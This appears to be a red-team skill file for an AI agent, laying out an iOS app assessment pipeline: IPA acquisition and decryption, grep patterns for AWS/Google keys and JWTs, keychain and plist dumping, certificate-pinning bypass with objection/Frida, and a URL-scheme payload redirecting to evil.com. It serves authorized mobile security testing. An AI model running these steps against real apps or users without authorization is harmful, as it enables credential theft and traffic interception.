| name | ios-redteam-pipeline |
| description | End-to-end iOS red-team pipeline — IPA acquisition (App Store extraction, TestFlight, enterprise/ad-hoc sideload), class-dump/Hopper/Ghidra static analysis, Info.plist + entitlements + Keychain secret extraction, App Transport Security (ATS) misconfig + certificate-pinning bypass (frida-ios-dump, objection, SSL Kill Switch 2), URL-scheme / Universal Link hijack, exported-service enumeration, Frida runtime instrumentation. Companion to apk-redteam-pipeline for the iOS side of a mobile app catalogue. Use when target has an iOS app (App Store listing, TestFlight link, enterprise MDM distribution), when an IPA URL is found hosted on a web server, or when post-recon mentions "iOS app" / "mobile app" in scope alongside an Apple developer account. |
| sources | public_research, frida_docs, objection_docs, owasp_mastg |
| report_count | 0 |
When to use this skill
Trigger when:
- Recon surfaces 1+ apps under the target's Apple Developer / App Store publisher page
- A TestFlight public link or enterprise/ad-hoc
.ipa/manifest.plist (OTA install) is found
- Customer-facing app, dealer/partner portal, or employee mobile companion app ships on iOS
- Bug bounty program lists iOS in scope
apk-redteam-pipeline already found Android endpoints/secrets — the iOS build often ships a different backend version worth diffing (see hunt-shadow-api)
DO NOT use for:
- Android-only targets — that's
apk-redteam-pipeline
- React Native / Flutter apps already fully covered by JS-bundle analysis on the web side
- Server-side only assessments with no mobile client in scope
Stage 0 — Inventory all org-owned iOS apps
curl -s "https://itunes.apple.com/search?term=<brand>&country=us&entity=software&limit=50" | python3 -m json.tool
curl -s "https://itunes.apple.com/lookup?bundleId=com.<brand>.app&country=us"
Extract: trackId, bundleId, sellerName (developer account — pivot to find sibling apps), version,
releaseNotes (changelogs often reference deprecated/removed API behavior — feeds hunt-shadow-api).
Cross-reference sibling-app bundle IDs surfaced from Android APK inventories (same
multi-brand conglomerate usually reuses com.<corp>.<sub-brand> naming on both platforms).
Stage 1 — IPA acquisition
Primary: from a real device you control (no jailbreak needed for a purchased/free app)
brew install libimobiledevice ideviceinstaller
ideviceinstaller -l
Secondary: TestFlight (if the program distributes betas publicly)
Open the public TestFlight link, install via the TestFlight app, then extract as above.
TestFlight builds are frequently LESS hardened than App Store releases (debug logging left on,
staging API hosts hardcoded) — always prefer a TestFlight build over the Store build if both exist.
Tertiary: enterprise / ad-hoc distribution (OTA install)
curl -s "https://<target>/manifest.plist" | plutil -convert xml1 -o - -
curl -sk -L "<software-package-url>" -o target.ipa
Enterprise/ad-hoc IPAs are not FairPlay-encrypted — no jailbreak or decryption tooling needed,
unlike an App Store binary pulled from a device.
Decrypting an App-Store-sourced binary (only if extracted from a jailbroken device)
App Store binaries are FairPlay-encrypted at rest; a binary copied off a jailbroken device
needs runtime decryption (frida-ios-dump, bagbak, or flexdecrypt) before static tools can
read it meaningfully:
pip install --break-system-packages frida-tools
python3 dump.py <bundle_id>
Stage 2 — Unpack and static analysis
unzip -o target.ipa -d extracted_target/
cd extracted_target/Payload/*.app
plutil -convert xml1 -o - Info.plist
codesign -d --entitlements :- Payload/<AppName>.app 2>/dev/null || \
security cms -D -i embedded.mobileprovision | plutil -convert xml1 -o - -
brew install class-dump
class-dump -H <AppBinaryName> -o headers/
nm -a <AppBinaryName> | grep -i swift | head -50
strings -a <AppBinaryName> > strings_target.txt
For a fast triage pass without a disassembler, the strings dump alone usually surfaces most of
what Stage 3 is looking for.
Stage 3 — Secret grep (same catalog as apk-redteam-pipeline, iOS-specific sources added)
grep -oE 'https?://[a-zA-Z0-9.-]+\.(target1|target2|target3)\.(com|io|net)[a-zA-Z0-9./_?=&%-]*' strings_target.txt | sort -u
grep -oE 'AKIA[A-Z0-9]{16}'
grep -oE 'AIza[A-Za-z0-9_-]{35}'
grep -oE 'eyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*' strings_target.txt
find extracted_target -iname "GoogleService-Info.plist" -exec plutil -convert xml1 -o - {} \;
find extracted_target -iname "*.plist" ! -iname "Info.plist" -exec sh -c 'echo "=== {} ==="; plutil -convert xml1 -o - "{}"' \;
plutil -extract NSAppTransportSecurity xml1 -o - Info.plist 2>/dev/null
Keychain items left in a backup (if you have a device backup, encrypted or not)
pip install --break-system-packages iphone_backup_decrypt
./keychain-dumper -e
Stage 4 — App Transport Security (ATS) misconfig + certificate-pinning bypass
Check for blanket ATS disablement (the single most common iOS network misconfig)
plutil -extract NSAppTransportSecurity xml1 -o - Info.plist
Red flags in the output:
NSAllowsArbitraryLoads = true at the top level — HTTP (cleartext) allowed anywhere, app-wide.
- Per-domain
NSExceptionAllowsInsecureHTTPLoads = true for a domain that carries auth tokens.
NSAllowsArbitraryLoadsInWebContent = true — WKWebView traffic exempted, common blind spot.
A blanket ATS exception + a network position (rogue AP, ARP spoof, malicious VPN profile) =
plaintext credential/token interception without touching pinning at all.
Certificate-pinning bypass (when pinning IS present and correctly configured)
pip install --break-system-packages frida-tools objection
objection --gadget <bundle_id> explore
ios sslpinning disable
If you want a Frida script instead, don't hand-roll one — use a maintained universal bypass
(e.g. the widely-used frida-ios-pinning/ios-ssl-bypass community scripts). Modern iOS TLS goes
through BoringSSL, so a reliable universal hook targets SSL_CTX_set_custom_verify /
SSL_get_psk_identity at the native layer and forces the verify callback to return "OK" — this
catches URLSession, AFNetworking, Alamofire, and TrustKit at once, which per-delegate
Objective-C hooks (like the deprecated NSURLConnection delegate) miss:
frida -U -f <bundle_id> -l ios-ssl-bypass.js --no-pause
In practice, prefer SSL Kill Switch 2 (jailbroken device, installs as a tweak) or
objection's ios sslpinning disable over any hand-rolled script — both cover the common
pinning implementations (NSURLSession, AFNetworking, TrustKit) without per-app tuning.
Stage 5 — URL scheme / Universal Link enumeration
plutil -extract CFBundleURLTypes xml1 -o - Info.plist
plutil -extract com.apple.developer.associated-domains xml1 -o - Info.plist 2>/dev/null
curl -s "https://<domain>/.well-known/apple-app-site-association" | python3 -m json.tool
For each custom scheme found (e.g. myapp://):
- Trigger it from Safari/Notes and observe what the app does with parameters:
myapp://reset-password?token=x&redirect=https://evil.com — does the app trust an
attacker-supplied redirect/url/callback param and load it in a WebView (open-redirect →
WebView-XSS chain) or use it to bypass an auth screen?
- If the scheme is also registered by another app on the device (scheme squatting), a malicious
app can intercept traffic intended for the legitimate app — check
CFBundleURLName uniqueness.
- Universal Links degrade to the custom scheme when the AASA validation fails or is absent —
test both paths for the same parameter-injection surface.
Stage 6 — Runtime instrumentation (Frida / objection)
Requires a jailbroken device (checkra1n/palera1n for older iOS, or a Corellium virtual device) —
unlike Android, there is no practical rooted-emulator equivalent for iOS.
pip install --break-system-packages frida-tools objection
objection --gadget <bundle_id> explore
ios hooking watch class <ClassName>
ios hooking watch class_method <Class>.<method> --dump-args --dump-return
ios keychain dump
ios plist dump
ios cookies get
Network traffic capture (once pinning is bypassed)
mitmproxy --listen-port 8080
Decision tree — what to do with what you find
| Finding | Next move |
|---|
NSAllowsArbitraryLoads = true | Confirm a token/credential actually transits HTTP — needs a network position to exploit, but is a real finding on its own (config-level, no MITM needed to report) |
| Hardcoded JWT / API key in strings dump | Same as Android — test against the API host, chain into hunt-api-misconfig |
| GoogleService-Info.plist present | Test public Firestore/RTDB/Storage read (identical to apk-redteam-pipeline Stage 6) |
Custom URL scheme accepts a redirect/url param | Test open-redirect → WebView-load chain; check for scheme squatting by other installed apps |
| Universal Link AASA missing/misconfigured | Confirm scheme fallback still carries the same injectable params |
Entitlements show keychain-access-groups shared with other apps | Cross-app Keychain read — a compromised sibling app reads this app's secrets |
| Older API version referenced vs. what the current web app calls | Hand off to hunt-shadow-api for version-diffing |
Anti-patterns
- Don't assume App Store = FairPlay-encrypted requires jailbreak — TestFlight and enterprise/ad-hoc
builds are frequently NOT encrypted and need no decryption step at all. Always check distribution
channel before reaching for
frida-ios-dump.
- Don't skip Swift binaries because class-dump shows nothing —
strings and nm still work; a
proper Swift-aware disassembler (Hopper, Ghidra with Swift demangling) recovers the rest.
- Don't stop at "pinning is present" as a finding — pinning is a mitigation, not a vulnerability;
the finding is what you can do once it's bypassed (or the ATS misconfig that makes it moot).
- Don't ignore WKWebView-loaded content —
NSAllowsArbitraryLoadsInWebContent is a distinct,
frequently-overlooked exception from the top-level ATS setting.
- Don't run Frida instrumentation against a personal/production Apple ID device — use a
dedicated jailbroken test device or Corellium instance.
Tooling install (one-time)
brew install libimobiledevice ideviceinstaller class-dump
pip install --break-system-packages frida-tools objection iphone_backup_decrypt
Related Skills & Chains
apk-redteam-pipeline — the Android counterpart; run both when a target ships on both
platforms. Sibling bundle IDs and shared backend endpoints frequently surface cross-platform.
hunt-shadow-api — mobile builds (iOS and Android alike) often hardcode an older API
version than the current web app. Chain: IPA reveals /v1/* endpoints → hunt-shadow-api
diffs /v1/ against the current /v3/ for auth/validation regressions.
cloud-iam-deep — IPA secret extraction frequently yields live AWS/GCP/Azure credentials
or Firebase configs. Chain: strings-grep produces an AWS key → cloud-iam-deep privilege
analysis.
hunt-api-misconfig — hardcoded JWTs/API keys extracted here feed directly into JWT
algorithm-confusion and mass-assignment testing there.
evidence-hygiene — extracted Keychain items and secrets need redaction before report
inclusion.
offensive-osint — App Store developer-page enumeration is part of the broader org recon
graph; pair with certificate-transparency lookups for the same brand.